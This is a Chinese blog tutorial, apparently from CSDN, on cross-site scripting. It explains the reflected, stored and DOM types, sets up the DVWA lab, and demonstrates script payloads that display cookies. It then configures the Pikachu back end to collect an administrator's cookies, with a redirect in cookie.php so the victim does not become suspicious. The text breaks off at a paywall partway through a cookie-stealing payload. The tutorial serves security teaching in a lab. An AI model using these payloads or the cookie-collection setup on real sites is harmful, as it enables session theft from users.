XSS跨站脚本攻击

最新推荐文章于 2024-11-04 10:41:16 发布
最新推荐文章于 2024-11-04 10:41:16 发布
阅读量4.2k 收藏 3
点赞数 2
分类专栏: Web安全 文章标签: xss web安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SYJ_361/article/details/122111796
版权
本文详细介绍了XSS跨站脚本攻击的原理、类型(反射型、存储型、DOM型)及其危害,提供了环境搭建教程。通过实例演示了如何利用XSS攻击窃取用户cookie,并展示了在DVWA不同安全级别下的XSS利用。此外,文章还讨论了XSS攻击的应用,包括劫持用户浏览器、钓鱼窃取用户信息,并分享了XSS防御方法,如输入验证、输出编码等。
摘要由CSDN通过智能技术生成

XSS跨站脚本攻击

文章目录

0x01:XSS原理

  • 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。

  • 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

    • XSS攻击针对的是用户层面的攻击!

XSS的类型

反射型XSS

  • 反射型 XSS,非持久化,需要欺骗用户自己去点击链接才能触发 XSS 代码。

  • 反射型 xss 攻击的方法,攻击者通过发送邮件或诱导等方法,将包含有 xss 恶意链接发送给目标用户

  • 当目标用户访问该链接时,服务器将接收该用户的请求并进行处理,

  • 然后服务器把带有 xss 恶意脚本发送给目标用户的浏览器,浏览器解析这段带有 xss 代码的恶意脚本后,就会触发 xss 攻击。

存储型XSS:
  • 存储型 XSS,持久化,代码是存储在服务器中的数据库里,
    • 如在个人信息或发表文章等地方,可以插入代码,
    • 如果插入的数据没有过滤或过滤不严,
    • 那么这些恶意代码没有经过过滤将储存到数据库中,用户访问该页面的时候,没有进行编码过滤输出到浏览器上,就会触发代码执行,造成 xss 攻击。
DOM型XSS:

  • DOM,全称 Document Object Model。

  • DOM 型 XSS

    • 是一种特殊类型的反射型 XSS,
    • 它是基于 DOM 文档对象模型的一种漏洞。
    • 可以通过 JS 脚本对文档对象进行编辑从而修改页面的元素。
    • 也就是说,客户端的脚本程序可以通过

  • DOM 来动态修改页面内容,

    • 从客户端获取 DOM 中的数据并在本地执行,
    • 而不需要与服务器交互,
    • 它只发生在客户端处理数据阶段。

危害:存储型XSS>反射型XSS>DOM型XSS

环境搭建

  • DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,
  • 旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,
  • 帮助Web开发者更好的理解Web应用安全防范的过程。

1.上传 DVWA 到 我们的centos 主机

  • 把文件直接拖到 /var/www/html 目录下面

  • 然后把文件夹的名字改短一点

    cd /var/www/html
unzip DVWA-master.zip #解压缩
mv DVWA-master DVWA  #把名字改短一些

    image-20211223092456196

2.编辑 DVAW 数据库配置文件

生成新的配置文件 config.inc.php

cd DVWA/config #切换目录
cp config.inc.php.dist config.inc.php  ##基于模版配置文件,生成新的配置文件 config.inc.php
vim config.inc.php  #打开新生成的文件

修改配置

21行
$_DVWA[ 'db_user' ] = 'root'; #需要修改成你的 mysql 的 用户名
$_DVWA[ 'db_password' ] = 'kali'; #需要修改成你的 mysql 的密码

#27 28行 加上谷歌开源免费验证码 reCAPTCHA 的公钥和私钥
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

保存

esc #结束编辑
:wq #保存设置

image-20211223092759136

3.修改文件权限

 chown -R apache:apache /var/www/html

4.部署DVWA网站

物理机打开网址:

http://192.168.81.135/DVWA/setup.php  #把IP地址换成自己的centos的IP地址

  • 点击 create 即可创建完成

  • 等待10秒即可返回登陆页面

image-20211223093132024

登陆网站:

账户密码

Username:admin
Password:password

image-20211223093252646

安全级别说明
  1. Low(低) -
    • 此安全级别完全容易受到攻击,并且根本没有安全措施
    • 它的用途是作为Web应用程序漏洞
    • 如何通过不良编码实践表现出来的示例,
    • 并作为教授或学习基本利用技术的平台。
  2. Medium(中) -
    • 此设置主要是为了给用户一个不良安全实践的例子
    • 其中开发人员尝试但未能保护应用程序。
    • 它还对用户提出了改进其利用技术的挑战。
  3. High(高) -
    • 此选项是对中等难度的扩展,
    • 混合了较难或替代的不良做法来尝试保护代码。
    • 该漏洞可能不允许相同程度的利用,这在各种(CTF) 竞赛中类似。
  4. Impossible(不可能) -
    • 此级别应针对所有漏洞安全
    • 它用于将易受攻击的源代码与安全源代码进行比较

XSS DVWA Low级别

将安全级别改为Low

image-20211223094010374

0x02:反射型 XSS

  • 这个功能类似一个留言板,
  • 输入信息后下面会增加对应的信息

image-20211223094320423

获取cookie

我们添加一条 JavaScript 代码获取 cookie

在文本框中输入下列代码

#我们添加一条 JavaScript 代码获取 cookie

<script>alert(document.cookie);</script>

  • alert() 函数:弹出警告框

  • document.cookie 显示cookie信息

image-20211223094646818

查看源代码

image-20211223094832894

  • 根据回显信息判断出,显示的文本内容是 Hello $name。

  • 我们输入的信息被存放在$name 变量中。

这里我们弹的是cookie,还可以是其他的内容。

和sql注入有一点相似,就是攻击者可以构造恶意的代码。

<script>alert("你被黑了")</script> 
#弹出【你被黑了】

image-20211223095037717

<script>alert(/hack/)</script>   
#弹出hack

image-20211223095113310

<script>alert(1)</script>        
#弹出1,对于数字可以不用引号

image-20211223095158859

补充
什么是 Cookie?

Cookie 用于存储 web 页面的用户信息。

当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。

Cookie 的作用就是用于解决 “如何记录客户端的用户信息”:

  • 当用户访问 web 页面时,他的名字可以记录在 cookie 中。
  • 在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。

0x03:存储型XSS

存储型 XSS 和反射型 XSS 的区别
  • 反射型XSS 只会弹一次 cookie 信息。
  • 存储型 XSS 每次访问这个页面都是会弹出 cookie 信息。
  • 因为 存储型XSS 代码已经嵌入在了该 Web 站点当中,所以每次访问都会被执行。
获取cookie
<script>alert(document.cookie);</script>

image-20211223095950952

image-20211223100321799

image-20211223100353777

image-20211223100458344

任意输入名字和消息进行查看

image-20211223100820742

image-20211223100620063

image-20211223100657069

查看源码

我们按F12查看源码 :

image-20211223101226909

数据库中查看:

使用dvwa数据库

 show databases; 
 use dvwa;  
 show tables;
 select * from guestbook;

image-20211223101510742

image-20211223101916199

  • 可以看到我门提交的数据被存放在数据库当中。
  • 每次用户访问页面时 Web 程序会从数据库中读取出
  • XSS 攻击代码,从而被重复利用。

0x04:DOM型XSS

  • DOM,全称 Document Object Model。
  • DOM 型 XSS
    • 其实是一种特殊类型的反射型 XSS,
    • 它是基于 DOM 文档对象模型的一种漏洞。
  • 可以通过 JS 脚本对文档对象进行编辑从而修改页面的元素。
    • 也就是说,客户端的脚本程序可以通过
  • DOM 来动态修改页面内容,
    • 从客户端获取 DOM 中的数据并在本地执行,
    • 而不需要与服务器交互,
    • 它只发生在客户端处理数据阶段。

基于DVWA XSS(DOM)

构造XSS代码:
<script>alert("xss")</script>

完整的代码:

http://192.168.81.135/DVWA/vulnerabilities/xss_d/?default=<script>alert("xss")</script>

image-20211223102513895

选择English之后,网页地址变化

image-20211223102610769

  • 我们把地址栏的English改为我们的构造XSS代码,
  • 然后Enter(回车)后查看结果
<script>alert("xss")</script>

image-20211223102922888

按F12查看源码

可以看到,我们的脚本插入到代码中,修改了网页显示的内容

image-20211223103213021

0x05:使用Pikachu Xss窃取管理员的cookie

攻击拓扑图:

image-20211223103330960

1.环境准备:

  • 先登录DVWA

    • 管理员账户:admin

    • 密码:password

  • 打开pikachu平台

    • 找到我们要利用的模块:
    • pikachu----【管理工具】–【XSS后台】

image-20211223103547982

登录

image-20211223103831134

选中【cookie搜集】

image-20211223103912927

image-20211223104026539

2.修改代码:
cd /var/www/html/pikachu/pkxss/xcookie  #切换到cookie相关的目录
vim cookie.php

image-20211223104317344

  • 把图上黄框那一行里面的网址修改为一个可信的网站:
    • 这里的意思是当用户点击后
    • 向我们的XSS平台写入cookie后
    • 再跳转回原来的页面

这里我们跳转到原来的那个页面

header("Location:http://192.168.81.135/DVWA/vulnerabilities/xss_r/"); #跳转原来的页面,这里IP改为centos的IP地址
注意:

如果没有这一步 用户点击我们的链接后会一直停留在我们的黑客服务器的页面上,从而引起用户怀疑

3.构造payload:
<script>document.location='
最低0.47元/天 解锁文章
小小西贝
关注
专栏目录
Kali渗透测试之DVWA系列4——反射型XSS(跨站脚本攻击)
浅浅的博客
05-11 4277
目录 一、XSS 1、XSS简介 2、XSS类型 3、漏洞形成的根源 二、反射型XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
跨站脚本攻击XSS演示(burpsuite)
qq_45070118的博客
07-31 3816
XSS简介 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的 通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击,事...
XSS 跨站脚本攻击的攻防
han_code的博客
05-13 887
1、什么是XSS攻击 跨站脚本(Cross-Site Scripting,XSS)是一种经常出现在 WEB 应用程序中的计算机安全漏洞,是由于 WEB 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。 2、XSS攻击的产生 XSS...
Kali渗透测试之DVWA系列5——存储型XSS(跨站脚本攻击)
浅浅的博客
05-11 2955
目录 一、原理示意图 二、实验环境 三、实验步骤 安全级别:LOW 重定向 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 存储型XSS 长期存储于服务器端 每次用户访问都会被执行javascript脚本 了解XSS简...
XSS跨站脚本攻击基础原理
一只抑郁的布偶猫的博客
10-06 893
XSS全程(跨站脚本攻击),其原理是攻击者利用浏览器执行前端代码(html,css,js)的特性将恶意js代码插入到web页面中,当用户浏览到该页面时这些嵌入在web页面的代码就会被执行从而达到攻击者的目的定义:反射型xss又称非持久性xss,反射型xss的恶意代码在web应用的参数,需要诱骗受害则点击范围跟含有恶意代码的连接,从而触发xss攻击特点:反射型xss攻击方式是一次性的攻击方式:需要欺骗用户自己去点击含xss的连接,才能触发xss攻击。
XSS 跨站脚本攻击
猫老板的豆
06-04 724
简介 Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。 攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全XSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。 而由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或者利用这些信息冒充用户向网站发起攻击者定义的请求。 在处理输入时,以
XSS跨站脚本攻击及防护
weixin_62707591的博客
06-18 3336
XSS又叫CSS),即跨站脚本攻击,是最常见的 Web 应用程序安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环,通过XSS,黑客可以得到的最直接利益就是拿到用户浏览器的 cookie,从而变相盗取用户的账号密码,进而非授权的获取关键的隐私信息。XSS攻击是一种客户端访问嵌入有恶意脚本代码的Web页面,从而盗取信息、利用身份等的一种攻击行为。XSS属于客户端攻击受害者最终是用户。XSS的传播性极强,由于 web 的特点是轻量级灵活性高。
Xss跨站脚本攻击
qq_52108058的博客
11-12 1093
因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。跨站脚本攻击,是代码注入的一种,它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。这里我们用http://xsscom.com/来演示。第二个是原本程序要执行的代码,拼接了用户输入的数据。目的是每隔一段时间访问网站,是否获取到cookie。,为了快速测试我们在所以输入框中都插入。提交后我们发现,在主题处是存在漏洞的。
xss跨站脚本攻击总结
太阳照耀我走四方
07-16 2198
svg onload="alert(1)"> //onerror 当加载文档或图像时发生某个错误无的弹窗语句onclick="alert(1)" //鼠标单击事件onmouseover="alert(1)" //鼠标悬浮事件最后还有很多的绕过姿势,推荐博客cookie:存储本地 存活时间较长 小中型session: 会话 存储服务器 存活时间较短 大型企业使用。
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
XSS跨站脚本攻击漏洞修复方法
06-18
**XSS跨站脚本攻击漏洞修复方法** XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网站进行破坏。本文将...
#渗透测试#SRC漏洞挖掘#XSS跨站脚本介绍02绕过
soc的博客
11-03 1033
免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。
XSS跨站脚本攻击的实现原理及讲解
最新发布
weixin_59571541的博客
11-04 446
XSS攻击的本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或其他意料之外的代码),当用户浏览该页面时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。反射型XSS通常用于通过邮件或搜索引擎等将带有XSS攻击代码的链接投放给用户,用户点击链接后,页面会从URL上取出对应的参数,渲染到页面上,此时攻击代码将会被执行。2. **脚本在用户浏览器中执行**:一旦恶意脚本被注入到受害者的网页中,它将在用户浏览器中执行,攻击者可利用此执行环境进行进一步攻击。
XSS-libs
2303_77961060的博客
10-30 495
alert(1)
XSS(Cross - Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞
huanghm88的专栏
10-31 1095
XSS(Cross - Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,以下是对它的详细介绍:&"'
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值